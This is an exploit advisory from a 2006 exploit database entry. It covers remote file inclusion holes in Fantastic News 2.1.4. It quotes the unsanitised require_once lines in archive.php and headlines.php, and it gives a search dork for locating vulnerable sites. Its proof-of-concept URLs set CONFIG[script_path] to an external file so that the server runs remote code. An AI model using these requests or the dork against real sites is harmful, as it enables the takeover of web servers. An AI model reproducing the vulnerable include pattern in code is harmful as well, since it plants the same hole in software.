Fantastic News <= 2.1.4 Multiple Remote File Include Vulnerabilities

2006-12-27T00:00:00
ID 1337DAY-ID-1330
Type zdt
Reporter Mr-m07
Modified 2006-12-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Fantastic News <= 2.1.4 Multiple Remote File Include Vulnerabilities
====================================================================



+-------------------------------------------------------------------------------------------
+ Fantastic News <== 2.1.4 (CONFIG[script_path]) Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............:  http://fscripts.com
+ Affected Software .: Fantastic News <== 2.1.4
+ Dork ..............: Powered by Fantastic News v2.1.4
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+-------------------------------------------------------------------------------------------
+ Vulnerable Code:
+ =>>archive.php
+
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ =>>headlines.php
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ Proof Of Concept:
+ http://[target]/[path]/archive.php?CONFIG[script_path]=http://localhost/a.txt?
+ http://[target]/[path]/headlines.php?CONFIG[script_path]=http://localhost/a.txt?
+
+
+
+
+-------------------------------------------------------------------------------------------
+Thanx To:
+ Yee7 Team http://www.yee7.com
+ Alshikh
+ ShockShadow
+ Mr.HaCkEr
+ StarseviL
+ AssassiN
+ Star Reach
+
+
+-------------------------------------------------------------------------------------------




#  0day.today [2018-01-02]  #